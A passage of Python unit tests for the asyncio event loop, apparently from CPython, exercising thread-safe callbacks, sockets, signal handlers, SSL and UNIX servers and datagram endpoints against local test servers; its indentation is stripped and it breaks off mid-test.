def test_call_soon_threadsafe(self):
results = []
lock = threading.Lock()
def callback(arg):
results.append(arg)
if len(results) >= 2:
self.loop.stop()
def run_in_thread():
self.loop.call_soon_threadsafe(callback, 'hello')
lock.release()
lock.acquire()
t = threading.Thread(target=run_in_thread)
t.start()
with lock:
self.loop.call_soon(callback, 'world')
self.loop.run_forever()
t.join()
self.assertEqual(results, ['hello', 'world'])
def test_call_soon_threadsafe_same_thread(self):
results = []
def callback(arg):
results.append(arg)
if len(results) >= 2:
self.loop.stop()
self.loop.call_soon_threadsafe(callback, 'hello')
self.loop.call_soon(callback, 'world')
self.loop.run_forever()
self.assertEqual(results, ['hello', 'world'])
def test_run_in_executor(self):
def run(arg):
return (arg, threading.get_ident())
f2 = self.loop.run_in_executor(None, run, 'yo')
res, thread_id = self.loop.run_until_complete(f2)
self.assertEqual(res, 'yo')
self.assertNotEqual(thread_id, threading.get_ident())
def test_reader_callback(self):
r, w = test_utils.socketpair()
r.setblocking(False)
bytes_read = bytearray()
def reader():
try:
data = r.recv(1024)
except BlockingIOError:
# Spurious readiness notifications are possible
# at least on Linux -- see man select.
return
if data:
bytes_read.extend(data)
else:
self.assertTrue(self.loop.remove_reader(r.fileno()))
r.close()
self.loop.add_reader(r.fileno(), reader)
self.loop.call_soon(w.send, b'abc')
test_utils.run_until(self.loop, lambda: len(bytes_read) >= 3)
self.loop.call_soon(w.send, b'def')
test_utils.run_until(self.loop, lambda: len(bytes_read) >= 6)
self.loop.call_soon(w.close)
self.loop.call_soon(self.loop.stop)
self.loop.run_forever()
self.assertEqual(bytes_read, b'abcdef')
def test_writer_callback(self):
r, w = test_utils.socketpair()
w.setblocking(False)
def writer(data):
w.send(data)
self.loop.stop()
data = b'x' * 1024
self.loop.add_writer(w.fileno(), writer, data)
self.loop.run_forever()
self.assertTrue(self.loop.remove_writer(w.fileno()))
self.assertFalse(self.loop.remove_writer(w.fileno()))
w.close()
read = r.recv(len(data) * 2)
r.close()
self.assertEqual(read, data)
def _basetest_sock_client_ops(self, httpd, sock):
if not isinstance(self.loop, proactor_events.BaseProactorEventLoop):
# in debug mode, socket operations must fail
# if the socket is not in blocking mode
self.loop.set_debug(True)
sock.setblocking(True)
with self.assertRaises(ValueError):
self.loop.run_until_complete(
self.loop.sock_connect(sock, httpd.address))
with self.assertRaises(ValueError):
self.loop.run_until_complete(
self.loop.sock_sendall(sock, b'GET / HTTP/1.0\r\n\r\n'))
with self.assertRaises(ValueError):
self.loop.run_until_complete(
self.loop.sock_recv(sock, 1024))
with self.assertRaises(ValueError):
self.loop.run_until_complete(
self.loop.sock_accept(sock))
# test in non-blocking mode
sock.setblocking(False)
self.loop.run_until_complete(
self.loop.sock_connect(sock, httpd.address))
self.loop.run_until_complete(
self.loop.sock_sendall(sock, b'GET / HTTP/1.0\r\n\r\n'))
data = self.loop.run_until_complete(
self.loop.sock_recv(sock, 1024))
# consume data
self.loop.run_until_complete(
self.loop.sock_recv(sock, 1024))
sock.close()
self.assertTrue(data.startswith(b'HTTP/1.0 200 OK'))
def test_sock_client_ops(self):
with test_utils.run_test_server() as httpd:
sock = socket.socket()
self._basetest_sock_client_ops(httpd, sock)
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_unix_sock_client_ops(self):
with test_utils.run_test_unix_server() as httpd:
sock = socket.socket(socket.AF_UNIX)
self._basetest_sock_client_ops(httpd, sock)
def test_sock_client_fail(self):
# Make sure that we will get an unused port
address = None
try:
s = socket.socket()
s.bind(('127.0.0.1', 0))
address = s.getsockname()
finally:
s.close()
sock = socket.socket()
sock.setblocking(False)
with self.assertRaises(ConnectionRefusedError):
self.loop.run_until_complete(
self.loop.sock_connect(sock, address))
sock.close()
def test_sock_accept(self):
listener = socket.socket()
listener.setblocking(False)
listener.bind(('127.0.0.1', 0))
listener.listen(1)
client = socket.socket()
client.connect(listener.getsockname())
f = self.loop.sock_accept(listener)
conn, addr = self.loop.run_until_complete(f)
self.assertEqual(conn.gettimeout(), 0)
self.assertEqual(addr, client.getsockname())
self.assertEqual(client.getpeername(), listener.getsockname())
client.close()
conn.close()
listener.close()
@unittest.skipUnless(hasattr(signal, 'SIGKILL'), 'No SIGKILL')
def test_add_signal_handler(self):
caught = 0
def my_handler():
nonlocal caught
caught += 1
# Check error behavior first.
self.assertRaises(
TypeError, self.loop.add_signal_handler, 'boom', my_handler)
self.assertRaises(
TypeError, self.loop.remove_signal_handler, 'boom')
self.assertRaises(
ValueError, self.loop.add_signal_handler, signal.NSIG+1,
my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, signal.NSIG+1)
self.assertRaises(
ValueError, self.loop.add_signal_handler, 0, my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, 0)
self.assertRaises(
ValueError, self.loop.add_signal_handler, -1, my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, -1)
self.assertRaises(
RuntimeError, self.loop.add_signal_handler, signal.SIGKILL,
my_handler)
# Removing SIGKILL doesn't raise, since we don't call signal().
self.assertFalse(self.loop.remove_signal_handler(signal.SIGKILL))
# Now set a handler and handle it.
self.loop.add_signal_handler(signal.SIGINT, my_handler)
os.kill(os.getpid(), signal.SIGINT)
test_utils.run_until(self.loop, lambda: caught)
# Removing it should restore the default handler.
self.assertTrue(self.loop.remove_signal_handler(signal.SIGINT))
self.assertEqual(signal.getsignal(signal.SIGINT),
signal.default_int_handler)
# Removing again returns False.
self.assertFalse(self.loop.remove_signal_handler(signal.SIGINT))
@unittest.skipUnless(hasattr(signal, 'SIGALRM'), 'No SIGALRM')
def test_signal_handling_while_selecting(self):
# Test with a signal actually arriving during a select() call.
caught = 0
def my_handler():
nonlocal caught
caught += 1
self.loop.stop()
self.loop.add_signal_handler(signal.SIGALRM, my_handler)
signal.setitimer(signal.ITIMER_REAL, 0.01, 0) # Send SIGALRM once.
self.loop.run_forever()
self.assertEqual(caught, 1)
@unittest.skipUnless(hasattr(signal, 'SIGALRM'), 'No SIGALRM')
def test_signal_handling_args(self):
some_args = (42,)
caught = 0
def my_handler(*args):
nonlocal caught
caught += 1
self.assertEqual(args, some_args)
self.loop.add_signal_handler(signal.SIGALRM, my_handler, *some_args)
signal.setitimer(signal.ITIMER_REAL, 0.1, 0) # Send SIGALRM once.
self.loop.call_later(0.5, self.loop.stop)
self.loop.run_forever()
self.assertEqual(caught, 1)
def _basetest_create_connection(self, connection_fut, check_sockname=True):
tr, pr = self.loop.run_until_complete(connection_fut)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.assertIs(pr.transport, tr)
if check_sockname:
self.assertIsNotNone(tr.get_extra_info('sockname'))
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def test_create_connection(self):
with test_utils.run_test_server() as httpd:
conn_fut = self.loop.create_connection(
lambda: MyProto(loop=self.loop), *httpd.address)
self._basetest_create_connection(conn_fut)
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_connection(self):
# Issue #20682: On Mac OS X Tiger, getsockname() returns a
# zero-length address for UNIX socket.
check_sockname = not osx_tiger()
with test_utils.run_test_unix_server() as httpd:
conn_fut = self.loop.create_unix_connection(
lambda: MyProto(loop=self.loop), httpd.address)
self._basetest_create_connection(conn_fut, check_sockname)
def test_create_connection_sock(self):
with test_utils.run_test_server() as httpd:
sock = None
infos = self.loop.run_until_complete(
self.loop.getaddrinfo(
*httpd.address, type=socket.SOCK_STREAM))
for family, type, proto, cname, address in infos:
try:
sock = socket.socket(family=family, type=type, proto=proto)
sock.setblocking(False)
self.loop.run_until_complete(
self.loop.sock_connect(sock, address))
except:
pass
else:
break
else:
assert False, 'Can not create socket.'
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop), sock=sock)
tr, pr = self.loop.run_until_complete(f)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def check_ssl_extra_info(self, client, check_sockname=True,
peername=None, peercert={}):
if check_sockname:
self.assertIsNotNone(client.get_extra_info('sockname'))
if peername:
self.assertEqual(peername,
client.get_extra_info('peername'))
else:
self.assertIsNotNone(client.get_extra_info('peername'))
self.assertEqual(peercert,
client.get_extra_info('peercert'))
# test SSL cipher
cipher = client.get_extra_info('cipher')
self.assertIsInstance(cipher, tuple)
self.assertEqual(len(cipher), 3, cipher)
self.assertIsInstance(cipher[0], str)
self.assertIsInstance(cipher[1], str)
self.assertIsInstance(cipher[2], int)
# test SSL object
sslobj = client.get_extra_info('ssl_object')
self.assertIsNotNone(sslobj)
self.assertEqual(sslobj.compression(),
client.get_extra_info('compression'))
self.assertEqual(sslobj.cipher(),
client.get_extra_info('cipher'))
self.assertEqual(sslobj.getpeercert(),
client.get_extra_info('peercert'))
self.assertEqual(sslobj.compression(),
client.get_extra_info('compression'))
def _basetest_create_ssl_connection(self, connection_fut,
check_sockname=True,
peername=None):
tr, pr = self.loop.run_until_complete(connection_fut)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.assertTrue('ssl' in tr.__class__.__name__.lower())
self.check_ssl_extra_info(tr, check_sockname, peername)
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def _test_create_ssl_connection(self, httpd, create_connection,
check_sockname=True, peername=None):
conn_fut = create_connection(ssl=test_utils.dummy_ssl_context())
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
# ssl.Purpose was introduced in Python 3.4
if hasattr(ssl, 'Purpose'):
def _dummy_ssl_create_context(purpose=ssl.Purpose.SERVER_AUTH, *,
cafile=None, capath=None,
cadata=None):
"""
A ssl.create_default_context() replacement that doesn't enable
cert validation.
"""
self.assertEqual(purpose, ssl.Purpose.SERVER_AUTH)
return test_utils.dummy_ssl_context()
# With ssl=True, ssl.create_default_context() should be called
with mock.patch('ssl.create_default_context',
side_effect=_dummy_ssl_create_context) as m:
conn_fut = create_connection(ssl=True)
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
self.assertEqual(m.call_count, 1)
# With the real ssl.create_default_context(), certificate
# validation will fail
with self.assertRaises(ssl.SSLError) as cm:
conn_fut = create_connection(ssl=True)
# Ignore the "SSL handshake failed" log in debug mode
with test_utils.disable_logger():
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
self.assertEqual(cm.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_ssl_connection(self):
with test_utils.run_test_server(use_ssl=True) as httpd:
create_connection = functools.partial(
self.loop.create_connection,
lambda: MyProto(loop=self.loop),
*httpd.address)
self._test_create_ssl_connection(httpd, create_connection,
peername=httpd.address)
def test_legacy_create_ssl_connection(self):
with test_utils.force_legacy_ssl_support():
self.test_create_ssl_connection()
@unittest.skipIf(ssl is None, 'No ssl module')
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_ssl_unix_connection(self):
# Issue #20682: On Mac OS X Tiger, getsockname() returns a
# zero-length address for UNIX socket.
check_sockname = not osx_tiger()
with test_utils.run_test_unix_server(use_ssl=True) as httpd:
create_connection = functools.partial(
self.loop.create_unix_connection,
lambda: MyProto(loop=self.loop), httpd.address,
server_hostname='127.0.0.1')
self._test_create_ssl_connection(httpd, create_connection,
check_sockname,
peername=httpd.address)
def test_legacy_create_ssl_unix_connection(self):
with test_utils.force_legacy_ssl_support():
self.test_create_ssl_unix_connection()
def test_create_connection_local_addr(self):
with test_utils.run_test_server() as httpd:
port = support.find_unused_port()
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop),
*httpd.address, local_addr=(httpd.address[0], port))
tr, pr = self.loop.run_until_complete(f)
expected = pr.transport.get_extra_info('sockname')[1]
self.assertEqual(port, expected)
tr.close()
def test_create_connection_local_addr_in_use(self):
with test_utils.run_test_server() as httpd:
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop),
*httpd.address, local_addr=httpd.address)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(f)
self.assertEqual(cm.exception.errno, errno.EADDRINUSE)
self.assertIn(str(httpd.address), cm.exception.strerror)
def test_connect_accepted_socket(self, server_ssl=None, client_ssl=None):
loop = self.loop
class MyProto(MyBaseProto):
def connection_lost(self, exc):
super().connection_lost(exc)
loop.call_soon(loop.stop)
def data_received(self, data):
super().data_received(data)
self.transport.write(expected_response)
lsock = socket.socket()
lsock.bind(('127.0.0.1', 0))
lsock.listen(1)
addr = lsock.getsockname()
message = b'test data'
response = None
expected_response = b'roger'
def client():
nonlocal response
try:
csock = socket.socket()
if client_ssl is not None:
csock = client_ssl.wrap_socket(csock)
csock.connect(addr)
csock.sendall(message)
response = csock.recv(99)
csock.close()
except Exception as exc:
print(
"Failure in client thread in test_connect_accepted_socket",
exc)
thread = threading.Thread(target=client, daemon=True)
thread.start()
conn, _ = lsock.accept()
proto = MyProto(loop=loop)
proto.loop = loop
f = loop.create_task(
loop.connect_accepted_socket(
(lambda : proto), conn, ssl=server_ssl))
loop.run_forever()
proto.transport.close()
lsock.close()
thread.join(1)
self.assertFalse(thread.is_alive())
self.assertEqual(proto.state, 'CLOSED')
self.assertEqual(proto.nbytes, len(message))
self.assertEqual(response, expected_response)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_ssl_connect_accepted_socket(self):
if (sys.platform == 'win32' and
sys.version_info < (3, 5) and
isinstance(self.loop, proactor_events.BaseProactorEventLoop)
):
raise unittest.SkipTest(
'SSL not supported with proactor event loops before Python 3.5'
)
server_context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
server_context.load_cert_chain(ONLYCERT, ONLYKEY)
if hasattr(server_context, 'check_hostname'):
server_context.check_hostname = False
server_context.verify_mode = ssl.CERT_NONE
client_context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
if hasattr(server_context, 'check_hostname'):
client_context.check_hostname = False
client_context.verify_mode = ssl.CERT_NONE
self.test_connect_accepted_socket(server_context, client_context)
@mock.patch('asyncio.base_events.socket')
def create_server_multiple_hosts(self, family, hosts, mock_sock):
@asyncio.coroutine
def getaddrinfo(host, port, *args, **kw):
if family == socket.AF_INET:
return [(family, socket.SOCK_STREAM, 6, '', (host, port))]
else:
return [(family, socket.SOCK_STREAM, 6, '', (host, port, 0, 0))]
def getaddrinfo_task(*args, **kwds):
return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
unique_hosts = set(hosts)
if family == socket.AF_INET:
mock_sock.socket().getsockbyname.side_effect = [
(host, 80) for host in unique_hosts]
else:
mock_sock.socket().getsockbyname.side_effect = [
(host, 80, 0, 0) for host in unique_hosts]
self.loop.getaddrinfo = getaddrinfo_task
self.loop._start_serving = mock.Mock()
self.loop._stop_serving = mock.Mock()
f = self.loop.create_server(lambda: MyProto(self.loop), hosts, 80)
server = self.loop.run_until_complete(f)
self.addCleanup(server.close)
server_hosts = {sock.getsockbyname()[0] for sock in server.sockets}
self.assertEqual(server_hosts, unique_hosts)
def test_create_server_multiple_hosts_ipv4(self):
self.create_server_multiple_hosts(socket.AF_INET,
['1.2.3.4', '5.6.7.8', '1.2.3.4'])
def test_create_server_multiple_hosts_ipv6(self):
self.create_server_multiple_hosts(socket.AF_INET6,
['::1', '::2', '::1'])
def test_create_server(self):
proto = MyProto(self.loop)
f = self.loop.create_server(lambda: proto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
host, port = sock.getsockname()
self.assertEqual(host, '0.0.0.0')
client = socket.socket()
client.connect(('127.0.0.1', port))
client.sendall(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('sockname'))
self.assertEqual('127.0.0.1',
proto.transport.get_extra_info('peername')[0])
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# close server
server.close()
@unittest.skipUnless(hasattr(socket, 'SO_REUSEPORT'), 'No SO_REUSEPORT')
def test_create_server_reuse_port(self):
proto = MyProto(self.loop)
f = self.loop.create_server(
lambda: proto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
self.assertFalse(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
server.close()
test_utils.run_briefly(self.loop)
proto = MyProto(self.loop)
f = self.loop.create_server(
lambda: proto, '0.0.0.0', 0, reuse_port=True)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
self.assertTrue(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
server.close()
def _make_unix_server(self, factory, **kwargs):
path = test_utils.gen_unix_socket_path()
self.addCleanup(lambda: os.path.exists(path) and os.unlink(path))
f = self.loop.create_unix_server(factory, path, **kwargs)
server = self.loop.run_until_complete(f)
return server, path
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_server(self):
proto = MyProto(loop=self.loop)
server, path = self._make_unix_server(lambda: proto)
self.assertEqual(len(server.sockets), 1)
client = socket.socket(socket.AF_UNIX)
client.connect(path)
client.sendall(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# close server
server.close()
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_server_path_socket_error(self):
proto = MyProto(loop=self.loop)
sock = socket.socket()
with sock:
f = self.loop.create_unix_server(lambda: proto, '/test', sock=sock)
with self.assertRaisesRegex(ValueError,
'path and sock can not be specified '
'at the same time'):
self.loop.run_until_complete(f)
def _create_ssl_context(self, certfile, keyfile=None):
sslcontext = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslcontext.options |= ssl.OP_NO_SSLv2
sslcontext.load_cert_chain(certfile, keyfile)
return sslcontext
def _make_ssl_server(self, factory, certfile, keyfile=None):
sslcontext = self._create_ssl_context(certfile, keyfile)
f = self.loop.create_server(factory, '127.0.0.1', 0, ssl=sslcontext)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
self.assertEqual(host, '127.0.0.1')
return server, host, port
def _make_ssl_unix_server(self, factory, certfile, keyfile=None):
sslcontext = self._create_ssl_context(certfile, keyfile)
return self._make_unix_server(factory, ssl=sslcontext)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, ONLYCERT, ONLYKEY)
f_c = self.loop.create_connection(MyBaseProto, host, port,
ssl=test_utils.dummy_ssl_context())
client, pr = self.loop.run_until_complete(f_c)
client.write(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# extra info is available
self.check_ssl_extra_info(client, peername=(host, port))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# stop serving
server.close()
def test_legacy_create_server_ssl(self):
with test_utils.force_legacy_ssl_support():
self.test_create_server_ssl()
@unittest.skipIf(ssl is None, 'No ssl module')
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_server_ssl(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, ONLYCERT, ONLYKEY)
f_c = self.loop.create_unix_connection(
MyBaseProto, path, ssl=test_utils.dummy_ssl_context(),
server_hostname='')
client, pr = self.loop.run_until_complete(f_c)
client.write(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# stop serving
server.close()
def test_legacy_create_unix_server_ssl(self):
with test_utils.force_legacy_ssl_support():
self.test_create_unix_server_ssl()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_verify_failed(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# no CA loaded
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client)
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(ssl.SSLError,
'(?i)certificate.verify.failed'):
self.loop.run_until_complete(f_c)
# execute the loop to log the connection error
test_utils.run_briefly(self.loop)
# close connection
self.assertIsNone(proto.transport)
server.close()
def test_legacy_create_server_ssl_verify_failed(self):
with test_utils.force_legacy_ssl_support():
self.test_create_server_ssl_verify_failed()
@unittest.skipIf(ssl is None, 'No ssl module')
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_server_ssl_verify_failed(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# no CA loaded
f_c = self.loop.create_unix_connection(MyProto, path,
ssl=sslcontext_client,
server_hostname='invalid')
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(ssl.SSLError,
'(?i)certificate.verify.failed'):
self.loop.run_until_complete(f_c)
# execute the loop to log the connection error
test_utils.run_briefly(self.loop)
# close connection
self.assertIsNone(proto.transport)
server.close()
def test_legacy_create_unix_server_ssl_verify_failed(self):
with test_utils.force_legacy_ssl_support():
self.test_create_unix_server_ssl_verify_failed()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_match_failed(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(
cafile=SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# incorrect server_hostname
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client)
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(
ssl.CertificateError,
"hostname '127.0.0.1' doesn't match 'localhost'"):
self.loop.run_until_complete(f_c)
# close connection
proto.transport.close()
server.close()
def test_legacy_create_server_ssl_match_failed(self):
with test_utils.force_legacy_ssl_support():
self.test_create_server_ssl_match_failed()
@unittest.skipIf(ssl is None, 'No ssl module')
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_server_ssl_verified(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(cafile=SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# Connection succeeds with correct CA and server hostname.
f_c = self.loop.create_unix_connection(MyProto, path,
ssl=sslcontext_client,
server_hostname='localhost')
client, pr = self.loop.run_until_complete(f_c)
# close connection
proto.transport.close()
client.close()
server.close()
self.loop.run_until_complete(proto.done)
def test_legacy_create_unix_server_ssl_verified(self):
with test_utils.force_legacy_ssl_support():
self.test_create_unix_server_ssl_verified()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_verified(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(cafile=SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# Connection succeeds with correct CA and server hostname.
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client,
server_hostname='localhost')
client, pr = self.loop.run_until_complete(f_c)
# extra info is available
self.check_ssl_extra_info(client,peername=(host, port),
peercert=PEERCERT)
# close connection
proto.transport.close()
client.close()
server.close()
self.loop.run_until_complete(proto.done)
def test_legacy_create_server_ssl_verified(self):
with test_utils.force_legacy_ssl_support():
self.test_create_server_ssl_verified()
def test_create_server_sock(self):
proto = asyncio.Future(loop=self.loop)
class TestMyProto(MyProto):
def connection_made(self, transport):
super().connection_made(transport)
proto.set_result(self)
sock_ob = socket.socket(type=socket.SOCK_STREAM)
sock_ob.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock_ob.bind(('0.0.0.0', 0))
f = self.loop.create_server(TestMyProto, sock=sock_ob)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
self.assertIs(sock, sock_ob)
host, port = sock.getsockname()
self.assertEqual(host, '0.0.0.0')
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
client.close()
server.close()
def test_create_server_addr_in_use(self):
sock_ob = socket.socket(type=socket.SOCK_STREAM)
sock_ob.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock_ob.bind(('0.0.0.0', 0))
f = self.loop.create_server(MyProto, sock=sock_ob)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
f = self.loop.create_server(MyProto, host=host, port=port)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(f)
self.assertEqual(cm.exception.errno, errno.EADDRINUSE)
server.close()
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 not supported or enabled')
def test_create_server_dual_stack(self):
f_proto = asyncio.Future(loop=self.loop)
class TestMyProto(MyProto):
def connection_made(self, transport):
super().connection_made(transport)
f_proto.set_result(self)
try_count = 0
while True:
try:
port = support.find_unused_port()
f = self.loop.create_server(TestMyProto, host=None, port=port)
server = self.loop.run_until_complete(f)
except OSError as ex:
if ex.errno == errno.EADDRINUSE:
try_count += 1
self.assertGreaterEqual(5, try_count)
continue
else:
raise
else:
break
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
proto = self.loop.run_until_complete(f_proto)
proto.transport.close()
client.close()
f_proto = asyncio.Future(loop=self.loop)
client = socket.socket(socket.AF_INET6)
client.connect(('::1', port))
client.send(b'xxx')
proto = self.loop.run_until_complete(f_proto)
proto.transport.close()
client.close()
server.close()
def test_server_close(self):
f = self.loop.create_server(MyProto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
client.close()
server.close()
client = socket.socket()
self.assertRaises(
ConnectionRefusedError, client.connect, ('127.0.0.1', port))
client.close()
def test_create_datagram_endpoint(self):
class TestMyDatagramProto(MyDatagramProto):
def __init__(inner_self):
super().__init__(loop=self.loop)
def datagram_received(self, data, addr):
super().datagram_received(data, addr)
self.transport.sendto(b'resp:'+data, addr)
coro = self.loop.create_datagram_endpoint(
TestMyDatagramProto, local_addr=('127.0.0.1', 0))
s_transport, server = self.loop.run_until_complete(coro)
host, port = s_transport.get_extra_info('sockname')
self.assertIsInstance(s_transport, asyncio.Transport)
self.assertIsInstance(server, TestMyDatagramProto)
self.assertEqual('INITIALIZED', server.state)
self.assertIs(server.transport, s_transport)
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop),
remote_addr=(host, port))
transport, client = self.loop.run_until_complete(coro)
self.assertIsInstance(transport, asyncio.Transport)
self.assertIsInstance(client, MyDatagramProto)
self.assertEqual('INITIALIZED', client.state)
self.assertIs(client.transport, transport)
transport.sendto(b'xxx')
test_utils.run_until(self.loop, lambda: server.nbytes)
self.assertEqual(3, server.nbytes)
test_utils.run_until(self.loop, lambda: client.nbytes)
# received
self.assertEqual(8, client.nbytes)
# extra info is available
self.assertIsNotNone(transport.get_extra_info('sockname'))
# close connection
transport.close()
self.loop.run_until_complete(client.done)
self.assertEqual('CLOSED', client.state)
server.transport.close()
def test_create_datagram_endpoint_sock(self):
sock = None
local_address = ('127.0.0.1', 0)
